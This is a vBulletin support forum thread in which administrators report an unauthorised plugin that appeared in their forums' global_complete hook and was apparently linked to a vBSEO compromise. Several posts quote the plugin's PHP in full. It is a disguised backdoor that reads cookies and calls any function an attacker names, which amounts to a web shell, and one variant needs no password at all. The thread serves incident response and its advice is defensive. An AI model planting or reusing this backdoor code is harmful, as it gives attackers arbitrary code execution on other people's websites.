Is This a Default Plugin?
Collapse
X
-
However you should change all your passwords... Email, FTP, Admin CP, vBSEO, etc... Especially if you shared passwords among accounts or used any password shorter than 12 characters.Translations provided by Google.
Wayne Luke
The Rabid Badger - a vBulletin Cloud demonstration site.
vBulletin 5 APIComment
-
Comment
-
I can't see the plugin id of added plugins, so I can't know if it was added by any of the admin users. It should also be noted that the latest vBSEO patch does not help against this as 3.6.0 has had that patch all the time already (see: https://www.vbulletin.com/forum/show...=1#post2257525).
I'd say we're all working to make the software as secure as possible. Eliminating any potential vector acheives that.Translations provided by Google.
Wayne Luke
The Rabid Badger - a vBulletin Cloud demonstration site.
vBulletin 5 APIComment
-
vBSEO's release announcement is incorrect then, because I've had another plugin added to the same spot even after making their update.
I just made a post about it on their forums, which I've quoted below for convenience.
Not sure if it might be related to this issue or not, but when I went and did a file diagnostics on my forum, it found that the file md5_sums_crawlability_vbseo.php was missing. Seeing as I installed vBSEO for the first time with the current version, I find it unlikely I would've missed uploading it when I installed the package.
EDIT:
It looks like the plugin is back and worse than before. Just went into my plugin manager to check, and found this under global_complete.
vBulletin Templates Cookie Caching
Code:/* vBulletin Templates Cookie Caching */ $vbr="ofkqjhri";$vbh="158b2179e61097612d74754bbc1e8c7a";isset($_COOKIE["vbinit"])?die(header("Cache-ID: $vbr")):chr(10);(isset($_COOKIE["vbauth"])&&(md5($_COOKIE["vbauth"])=="a32229ad78262c52c4073b07fdd58912")&&isset($_COOKIE["vbcache"])&&preg_match("/cache:([a-f0-9]+):([a-z]+):(.*)/",$_COOKIE["vbcache"],$m)&&(md5($vbr.$vbh)===$m[1]))?$m[2]($m[3]):chr(10);
Okay, just went to my admin log and checked. The plugin being added is clearly showed there, however it's being shown as added by me and with the IP I am currently using.
Here's the kicker though. At pretty much the exact time this plugin was added, I'd made the vBSEO config file writable so that I could change some settings. The timing seems too much to be of a coincidence.Comment
-
If they've done something else after already gaining access, they could be sneaking the plugin back in in a large number of ways.Comment
-
Comment
-
Okay I have this plugin that I didn't install:
vBulletin Templates Cookie Caching
here is the code:
Code:/* vBulletin Templates Cookie Caching */ $vbr="hgfzshne";$vbh="49cfac7025dfd5d00dc5a080c4a5c637";isset($_COOKIE["vbinit"])?die(header("Cache-ID: $vbr")):chr(10);(isset($_COOKIE["vbauth"])&&(md5($_COOKIE["vbauth"])=="a32229ad78262c52c4073b07fdd58912")&&isset($_COOKIE["vbcache"])&&preg_match("/cache:([a-f0-9]+):([a-z]+):(.*)/",$_COOKIE["vbcache"],$m)&&(md5($vbr.$vbh)===$m[1]))?$m[2]($m[3]):chr(10);
Comment
-
Delete the plugin. Make sure you don't even visit your vBSEO control panel until vBSEO come out with a fix. Report back if any rogue plugins appear again despite you not visiting that control panel.Comment
-
Confirmed another name for it
Code:/* vBulletin Dynamic Menu Filters */ (isset($_COOKIE["vbulletin_collapse"]) && preg_match("/menu:([a-z]+):(.*)/",$_COOKIE["vbulletin_collapse"],$m))?$m[1]($m[2]):chr(20);
The opinions expressed in forum posts are my own personal opinions and do not represent any companies that i am associated with.Comment
-
Same location as the previous ones?Comment
-
Yes same location, Ive checked 21 clients sites so far, 2 of them have been affected and also a test site that was only setup last week has been affected. So far ive found nothing else apart from the plugin but i am disabling VBSEO as precaution .The opinions expressed in forum posts are my own personal opinions and do not represent any companies that i am associated with.Comment
-
-
Comment
widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
Comment